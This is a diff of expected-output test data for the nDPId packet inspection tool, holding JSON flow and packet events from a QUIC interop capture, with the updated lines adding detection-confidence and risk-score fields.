 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1603816434765,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434765,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApalAAEAReTTAqAGAhfLO9L\/\/EVEE7ON5xgoKCgoIFbSGVwPjC1AAAETSB6nk7BQZ0n6OtRMgfqRMKv0mmF2ZCcJpOh5y0A\/toFlOz1fz5pBGD1YqR4r423K3bLjZPtU8zEdGrInkcNVS7Z9ZXa9KjSFkO6ZkCM+bgjrlPSYegWgr+lf8Seik\/OAa+9m4F+SKC3n3FYnChgcugjttcabtxcQG9UUmURCrO7eKZHimNrioYr36+LduCnNt9LNd\/zB6gPQej59n1H2PIibmagW\/fM66aVsVaR7zVHUCiH\/Qk70XwReQUNqQdtSK1o3x5foHfXLA3D5kXGSVsWki0olqZxxN4FQAu5\/vbJypl6cmZI9OG9mEaVsP3cQN5V6DcyMwwFq92zydNBh3eUgEPN9OuCoA1RCaRF2MY0ZRrUi4a0NGDiLUCV+G4SlLziz9xOJyHgGzjLPAE4BCeRh\/v6+wEZ8mgKyLD1EAVDV3zN30JJ6M0Me3hNHEEbe3VogRVZ0JV6CPYSKozfqmRIa1OO7TLbpqRx6m0yU\/HDbQvXQVvGPqTESIeDN9OWt+hRw0H3fhD\/0jWSUXeT5zzK0QccSYs9OMt6xct2EsrhYBO1aPATDoyaZAvzwTNWt8Eo\/XQktNf5jtBBlktbQBo67n4yyIo5rxgyPWJpQuRO297O7Mat4F1YWbTtTthkWIST5XlLQDR9sjWJQZoLrrVPuOGNaGgLiWbJpKZkPAmpkeoL2fbBEubmo\/7AK73pscjnUsQfmTU2Lhlzk7lE5KZzfdO6Ojycq4INOAlTRsxjE9Zej3obzZ+qt62gpD1eMqQQ4pmr3v0LhMGBrSM5EJ3Lmee9+dMb\/4XFUcIqSZvmCu1M+oA1IifmzxY0YneJ0hq33tjmK17Y6LsqmZvgvIsEtHUfp0429tqiTnJ7jEj9nv1Qws03vEaDx+VL91DFUBUZJsS2cGo6zH4U5+3ALd1d9yNs8qALm9NC2sFDyPeFu+wcrail+CekPau3rfVm\/\/BKg6uu98kDdJCbd1K4G6Sqm\/PNtzcVB3Yj4nmpQutpeBoYu\/N\/9zeylcHDDY+njAE8iIJji89hsMpr06VVSWYUsxYktuKVqxiBHUsyn1Qm+B+LGljetv1Jxr8cQu2ysaGbDgZRBSueKSbvXGNWhWLq7YBfLNgLfLQd6u0Si9aGjm8Is9C7byUaZ2JPKY6uJyDHXlNjc8po\/+0JxVFx+TI9y4r8FR94PIlv+t0snjZMMmWVUUkN9jPEM8reQ6rFbrOw2FyLxYpr7e6DBlYpr1rXi3y2AXbHOBjn\/yzFASJZWgEwjT9kc8\/kszRPabFnemr71tJxRnqsT7Z8rLpEDPHd34XFyRMJy5FhlpGRF5xBBWEPcYiNM4ACXS2zaqVvc4Ob6UONNiC5nq2MkrUel7u0fH3y+QFu5zcqtdETTA0rau+rX839r2M0xAous9B\/DzSAmhABN55MwenMuZXqKqO87\/SWuW3bCHCwmA4YTm0Y3MW31xmUfWCARViMQoMKL4e47lsZJmCw0S76EdXYT\/tkaU\/XJ34K+CTAC9yoTmJCAO9jIFpf2oBzdts69jtTj6Cw9qgKbQnkEP\/wuWHtVAcedrnVjSQu7O6Hr86jboN5XBirNkD\/k3Zb0R5f1hF1X5cR6OxDuouIjIFrBbnyzMLcWJq+pJzxbnTW8A+JnK8lKA7Q=="}
 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434766,"flow_last_seen":1603816434766,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434766,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1603816434766,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434766,"pkt":"PKn0qB\/spJGxgjQ5ht1gCcrWBNg6NCQAiQIAAAAA8DyR\/\/5ppFQgAQsHCsnVrqTT\/kdpHoB9AQTxKAAAAABgCq04BNgRNSABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUlL0BuwTYjlPGCgoKCgjBjvWe+MPFRAAARL4AnyCwAgoQjL1g+KDURvDYeEyLw\/xCRk6Dll3vQteHoVQFBQKAtW3\/PUJKxA75UMcNXhZUvkOXlYopsWey\/u66wX35Pj6pU3CXAqQ3fDp5zyCvr8Pm5AyoNAx0veCSUQeDBYfIgnerrrO2MEGoBqYPiiUt8xe5+r79P3P4ZzDRVupqGycbUWtQ6Wo6aZSD05slEqoyPBAaLp3YhydnPgb7vRWFjq0SdM0H\/zxBdY7aJ5VQRGeFUx984uZ\/K6yeMGPT3JYsoR6JIONmbNNldMQuEP+a7GBJ3iEWFJ1Nkel3g0iBwZRA7TTHinpesR5BAPJGKsJg\/VS2BeEVhnsQklM+ccg8cEJ\/WZ8KGZKu2b5eb3vaAvV55IOI0J2iO5UmLyQCl7SbwQC4xeRqoU1X\/r4ksMW+JxOVqFoTOp0p9K8G2C+kXU7PkGNUF6LWJgz0gBnPUfLEiLYep+IB3ydQMSXFv2q4ljMWpImZsfM1M1hyBHVdutiac3ctGpn70sK96\/GuFpnGs5SaPUZPVAd6cowQNyios9VD7LJHBycvPPV\/FVVqGKmtlmE1jhqYU8WM3TP2hIDFKj\/VkbTWINB6wKhdoTjaE++G5UWOW3DyJNvkrdNQDmb57TWpCvvDwZ0zyc9+kjM1P8gJU7fxklAOWt77tLOKjqKz2yyGTywbYI8fpyDxuwcOqHHM1p9Qo2bUMzUDDc5AgR5XXK8f98\/2k\/szEHoOj+xZ0LAk\/ktl3\/tNcCYf5NwDCkoJ2SA+A3liVp\/z86DQ\/o9ZPBbnT\/MRpriiusVj\/+7dyNzTUlosBxg\/ZTGIAFG9kkbqpmlXa9h8whQ+M5AjGTQXahgxhUg+T+XkcD3\/AwAskzg7QFF8QOQvTkgKR27pnPB9TcW0ov3zRKBSq2IRQasfzD4018QjLIoL6M1i7zKWOriPXhrbpQCBMed+qy0CCutCqcHfM5C6tdP5yjdd03xLltagPaoEJdMAzkTI4GTxawZxV\/nJEB2CpfHpXBAiLmSF3pSqQkOlK3gecF6Z5kJRZxdfHFiYQc+ZeBxM3ZsG9j3S6poeVhWhKtKijv579ezhO7g3QE97akiUNAtC\/9u96VNcgwwZo3pYzoh+bmR12ZZk\/flZDnZgzTtqeO5zikP6EaDg3xt4ZqzYpvmcwxx5bFkZ6tYCa\/WSn2OsS\/V89R9JkA+p04smS\/E7zSLxIHIjg7ziPRYLmF24dGHz34FZmheQHZ\/4gm1aFmIaG6\/7f5wmQDqHrB8QpqkJoLkDgUUHwTgyqeLrCOeAdu2eQCQJ4129kNDhXnJ7gWkCKO71EQxgH1wOzb5+V8dr\/jGNAAVFaptYOiLQes+Et0OXv\/4vGauirP+hYZEEAR3InBIIg\/L5KPxSdMCpSCm\/3UnE1zUNlTk7El74hPsNYUcmUS+usyw22jx+xLs4q3Kod9YDt4DrToci+qgaxSPs+xB3bX18DBMDyb8wNM5xFrlJXeWv7YCCDubwS+dnWseGEwnfJTp8dJgKhqy8jDuI7wNl1iTi5TWAuubz7G08V4L8udRmpqYJpILlag=="}
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434766,"flow_last_seen":1603816434766,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434766,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434766,"flow_last_seen":1603816434766,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434766,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 01187{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1603816434766,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1603816434766,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAgWgAADQBpMeDnxjGwKgBgAMD5agAAAAARQAFAG8bQAA0EXREwKgBgIOfGMa+BBFSBOwcysIKCgoKCAcy61WfYmyeAABE0qUiGIQ4aIhBbz9agQnzKFP+Ko6UG2\/VO43Zha3PL4kqY0AO3g0iECAhk\/6ZwBC4N756XgQuYU60gIOctL9zb4\/OWAg0WA1DbWYP4KnPZTIp669qsv\/rQAibIfU1C4jJIVVwUvw56ggX1ZWtsSkpVhlWA38X41jyzp4YyuLbkb3bAYN\/EIWaL4EMGxO+IKXjPgtJdchWUK\/9x2bQrLTQrTrt1LVvOFtezyOxX3HU59rOyjLCliLHhymipAdeA2iilJa\/G\/jNCnm92iYqQ99y1tLbXGL1SO3nVuTvR5sjExBx5iwaDhDbYKtasZmgPHXFcFC5nc+7+wPPW5yfWD1laEE\/wGN7z2vQj3O2l8846UB817y5kdQqfJcn3ryUAQboDsw9RBRvujkaoMcMv7dwDFaulIkwKjh5NdGImH6DlqdJnNJe\/djBGIoTx+FNEOCf8VgkH2AS3NkcDuSUvP6wRjfzpEDMKt1+bfZxTozz2QUXP\/r1d5e\/ChVkzBO9tgTIIsrdTwdCDHK\/8GPaAe9Z9\/eOLqg1E0MYdvN2a123wOsPL+4jXgdZ77SJH2U6Of\/XWPTaYlfaheABwpiMv6I00YAPVCHV\/IRMeTtBZrb8p0Ppi3qMyAgRXlwJ6aGPFOXZdGvMJWgaWpFkLrTD65P5wK4ostYxbEc="}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434772,"flow_last_seen":1603816434772,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434772,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1603816434772,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434772,"pkt":"PKn0qB\/spJGxgjQ5ht1gDK7JBNg6MyABGfAABAA0AAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9AQS44gAAAABgDEm8BNgRMiABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABrNMRUgTYSrXMCgoKCgj2S26kHUj2aQAARL4Oqb7kxp8VwqfBhPdfdtQhtwUXSB8\/M16zqaKTaiM4uFSCgiApTua+W3aFO11E8\/vpjw5fdiBSABUTDotMg5RkiQr0MSpUaARnrP0PNMBaoZi0T3torsgUpfH8Z7GKLvwTGd3hbCPXQz5HEzUHjJnObkXYOU8pDBMRAGZYnp5rkZbRT2vPBVCj8Cvx8bBBKneUgl1FG4uQ4EwyOma55O1RYgmn2Ynf1Ko5xhvyQTnOGQ+R1VyW0n7heo02IMCfY4VWPj\/QJHyKTPMBIDBtSvz3J6mf3nv69QC6K+3y7kTFVD4RNSmXPDKfJ4r8a\/jVYQ3tiwvsysKnCLgA5zby1+dfPHEiaiwawfH+cKDMssE48zXk1+MDRnahgP5\/5W7h5R0W7WQX3skNYTREacQ3LvDACn58ERfFzl2AshIb29QMiGQj+aXYqT7ftIu1mYCEtR10HqM0E0tdjMJlVoxU1sQCMNHCcSjur932nDLMq95bmJ\/epzRqKtYXqFfJm4ZnhGTZV2QZB+hX7pNkAbrVOicdWh6ASPsIKRVzbgM4azW3TFLOWbFSWksd82BdcgW3kBeZ+Zy87igudzpPx0kdISA+wUJUrSUaJmejNXcUK68sicz01uq+5FBxl7uzJB5i2OXGU+jvmL+lkKweCPtvayVLhcuvz7KLW1nrXu3HU\/E\/bgsaTJyGVokl31OFOSR9LQtdKuoewFPyn5r490C8zNMeXqpImt2kn4Tr\/jlH\/fxzyim4MX4msP404e3jLfo+J9lzJhkenDu9xAnUgd\/iKSb6RgtGPU4Y6NI2QNpIfd6MzugcP8a0lodftPQcResoW35Hgg5t6I+PqN5frd2jtB5RiFyFN6yYVSH5fwqpb5sgLyM2ZMvumoV6ZVCMO3EMaRJu6f+U3CDduLYbXqPjXTUFXnzx9Vt03+YreNFX6wa5PrrBlSKMZP\/2WAmhb8cWINvyoZmFlnI2qd6sXg1dpFNY99Vqu1GrXPgV8Qi9MxV9uHzluuqG5swDMVT91S3LeU6XPmicYuwxrVZ0fDoeWpn4Kta0sEVDVUOf9hI8REFrn\/lLtMViNZ5rtWhIMKLyMIne37ob1RynB8J3PHqTTUqyQWLUmsA7XpXuycyFg0eDsVEBgiX65miUosWBtlhptbWoDODs0zqjlEGqOg5rKyio59+SI+p7jTV93mdfy9Wt2QGrnsPSiOSsj\/pqM\/pZ2PPrcgdTK9VPceK3CdsRz\/jNTpieviefPJXgnQD9JDKvgbRzI7jy8hldn4q+BSAvi3W0FwGFIYHJsgwTS2D+M4jyoohPca8fHwPwrKPUAytl3yLskOFTcOEOwWAP0YkHc8DSZIYnWDfZRitncpUl9qEcnjpTihvHHfw2HQxFR5lkMlUwBOL06kpNLUObIMz0gJ8az8O5U2MJseOwsScI7UtAgMA1Wat1Jr7S5b3fSl1DVUzvG0hnyrSZS2C54u89rSG8QQybBKCeSDnq1GpKeq\/O7HdjP04WmFuLDA\/vf\/9lSaOXhNpEErLndSFsHzNaPYP8EGwGI4iaWZOfcrm8Fw=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434772,"flow_last_seen":1603816434772,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434772,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434772,"flow_last_seen":1603816434772,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434772,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434776,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1603816434776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434776,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAYA1AAEARdrfAqAGAM55pYqrXEVIE7DzAzAoKCgoI2nqja59HDyMAAETSIwUh\/jjSyce1pBuktMAn\/9fQVpvzsj8X4f6zzIa5zUMyPshEJVxx\/HgJpy2DounAtWqOn7MykfNk1iAT6IFLl5JJDlHVUgHekilaBHXQFm7iNuBD05oF1B0F7q8Qrx84dCVbjPq2TzzI4E8Jn0w6eGKEzj3zAOYyN\/jtcSwUMH\/tdAvJ2KZeRWAZwgBZ+NHFpdpJskxMoq8BiazR6NmdCcDVWJJafWv\/J6n2MwHgdrbXoHD7z9vBv7OTw1ZsmRTWOginovLBtLwEow12QHwK+3EKlGb67Dikjj6Hsiva+EHGjyXXT3NafDD2Mdy+tEkICJVPMdfQgSiLKciRXmF+eiaKhn6t+ZZDXwMIx1tObSDzE+o6+VwUniuIqDp4P1P\/ToVtD+B8x7Pd8fdBpJ4GLav9M4cI3Wrt3ZFYV3\/N8JUWUnnIryRD+gsn8U6xZxSihwbPDnANbZkkqUwtRBWNdvrID63JeJlKECXOhipg3RPgW+AtU7DD8FGCQwK077KHK\/4iE0FRnsfBWs4NiPYWSuDiKbOCzUPifBciRr8tMI1kDMDYdqhOf\/t2cQwVRdaNiCXpVyvtWa68KE7YuTZbjpI5Zm9LOCld3hJ01MiZ7LFRGruZgu66Qt6cNK570mj580eh0jpjgWEGkDr8jkE8qlxmZ\/+JhXsVQeSLOCJpxCPnoKcC\/AgENxJJFj5QqhvZ4\/+S85TLqOVPU75k58aRkk+ToNWPiawuoh+7ZmQNuVNQVgcCtQEXQJu346G7rcjTAKMH3PDGS8OBxREkqOUKIE\/fJzE5mkwFxduFK\/B7NuaeUP\/viNgVQPK+xx+1Ngb7A4VcDPdAPTWKWgbWpoEudTGTXV58El7GU8KydW+XNFItpFzmhNuEFbckU8GM1h8hyV6YxNQ+Ywvmqeqx+Qpa2gsPfebPvZhoavla3sgCdU8L3Fi\/gojIsV72icFiRHpi7wgSeg+dYFEA+ApHg9oKhJJhp8\/wWsOTm76uoFhEbKbRL2YPAgB\/Ql+puWC+1\/d1JEz2eZaAp5Zo4yW5zTvhxVsa5hrrLnPK2t90EkaeWT3kM4NBLrAUyq7fPgZ5preHWxkcCRzxymqgt+6Xj2oWVLVyaqWrzsHWrurGOxbP60QM5pMHY613Q+LrLNvTCsh4ZQzv0k2FKQRVr9u07bMlGLVO5kHK8AlGOnI97GL1hRF\/kBPlbHravjlbftLM0ZE+ofUKm3FCAyqpSNR5f+azjzb6QBklYN+zHv4anLf2bRojetf7WIpCzUtOun8gE3beg5nRdzOcNC5G1ZAhS4QZYrCUyLzy6dQnaI5ti\/HjmSldcvKZM0X8HEANm0ee5l4G\/rQp3samcnQbFsOFm5GfplnfCVyDu6SZLaWZt28o+RfSwBU5HTnFtZyilWnthqnChfP+hUfiDQ1asKcjklc33MY5RFlJ6ek8gI0+BRbnKE7zMoxaJ8oo9BJU12dwyF3tndCM1wJjl2MBm5rkAUb1j4xIIVUrcA0Os8Qp7MwNsapkh+lLuE3uc7vgFLS327NgSo9rR6EA2jIx++BL4omb8CcMSEd5E0h8ER2PPQ2Ijvdcaa4AGZMCHiMkSxGpTa9jY4devoI6nqBsHtnxRjt+CQUUD3xf\/+arnnuqKk3gOjeyEQ=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434776,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434776,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1603816434779,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":109,"pkt_l4_len":55,"ts_msec":1603816434779,"pkt":"PKn0qB\/spJGxgjQ5ht1gC0dvADcRMSYEqIAIAAChAAAAABJ5MAEgAQsHCsnVrqTT\/kdpHoB9EVLSAAA3EH3TAAAAAAAI6BdjXmXwmldRMDQzUTA0NlEwNTD\/AAAb\/wAAHP8AAB3\/AAAe\/wAAHw=="}
 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1603816434779,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434779,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA7X9AAEAR3vnAqAGAyu7cXJgVAbsE7F0\/xwoKCgoISaS\/HP4FIE0AAETSs+MVmuG4wpmNcPXwiwbgkyhiThvn0LHBRqHfn+gXOdfthzxlp0ltI03pZKw9vyqEYoBiUoMOALn8iwjEM1bBG0sKOHNmuafb9yKJq5CpXdfVW9fnnip2p1tWnGQZccSpOc1uq0bHiGjb10mg3cqpILSGktAMKwPjSF47KMJxZp\/l9ao1+O97nqhSrQZgHoEMImlI7ZCND\/wyqspL+eu6NAWz3rU9vba3BnFw354DNfuXu8HOGbC3Guvt9ytqxi0Yz5DSI1kvCcdc1n7wT0BoaLVFB\/yV1s2y5v5nH3DzJd2ACj9o\/zmaZyMpvWCTRg29elBjIR6fiI98dZm7sRE0VcNIEEqTNqSeoXcWt5unTNHBRYj7lwzoPoXK2TUjG515g9q9fHLJbLWr6\/hB+vEJG6S7dsFN6dIXdTpgqWHu81xJ1m9hfY7AkYBIllm4leEOWu1SRr5c\/AEsknAD+6XbQas8XXqJRRnDaBD1csMJtZvxoVWNSuOHBfOUyiZ4hDYxHjMLTLGygYFsDHCP93SCma0J1PrsKV4mBTWbhdzxAD3aoMxgjoxla8DQxuClSD4NOC96GJ+rdubJmMLxnEpF5JDa1IKuYrUXV3w\/4wQZqtP7g6zDf2GhddDBCDNr7yc+hg+5ilxcgcb2MVoLkgX1OkizCx2RSfRb0eK8thsruCLFSby4jO8bsuNj\/DwRHrD9ALa9P\/tMKNqD\/QB3PCX6uMJrfyT324LeetrVxPvOBvrQpiJegaN9JcarJLQiUBPGBrK+q6yGhmqia+H4CTzm98FspAgFJ3pIDJit2uCN0awhg2fUthbI0kXrjD+YpQbOi0QPuM2dRjqPXjXqrT+X2FbVUvVA37Xe2HlgHJQb01jyc3xry22J8\/uMKksqV4OfH9xACygHSWKGL7403rhhUIh\/1OKDuete+v6YGMI6HZHwxepcu1MBc8\/3NDyIJT7pGaR74MXwks5nUPSMbWXdz5gpe86RgRisPos\/HQNeweIwtPmU7vDULxHYQYbZJm932INOf+U0JuYM9\/0yyF82eovZ0gS\/AOY09vwKYKSps2BcZpcxKZJ6olMmG8Bd8RL\/TLXZh8OzsalyvubiZwDWuVVt1AZfvz8bSBiibxOi0oZJkb4Skel7UVJq4ZUt\/AwshUTtNvBmdhQCuqFbi+vqgJQibSCoN9R4ZSyuDwh4LgKfjp+jo8uQyFbtI8t7MPDA2gEjE9qSW351YU9i5A\/s6I\/H0QY4qaYHU6kmhNbmIKATtEXjZl9SsVnMQ++X3XZU09ZdvRROedhNjBpUePUF2+I+GgpQe9uXNKuTX5eintxBFe\/K9\/CrJuH447MCSJbL3kP6Bf4Qg2eo6fEs5dY6Gxdja3GF51OjnRG43ifui\/tVzaMUi324TS\/XRgkk6p17f60JC6V4Gg40mbPu0O21JxeTFWtWMYV6jinEN5pHS5s61dr9fU3vtxIOEN\/xMZjMROyRyCA55e\/0gx+GVjszIFs+UXq\/SyGgMEveU6gGW5EAZ3dCbJv6R+xa9kprk+rkDzgIuFc+I5Eg81JJd+kRHZiTfuhJaM8VwpyTDR71\/6\/lU7nCHcQiW3bXtU47eJyWza+vS4JMmYpHRxlNVbyyHp66eitmqcsnzcAlPI7xtrqCvg=="}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1603816434782,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1603816434782,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA\/AABAABwRNNQSvVT1wKgBgAG7iFcAK9mxgAAAAAAACPLo65bqtzD4+s6wDvrOsAH6zrAC\/wAAHf8AABs="}
 00642{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434784,"flow_last_seen":1603816434784,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434784,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
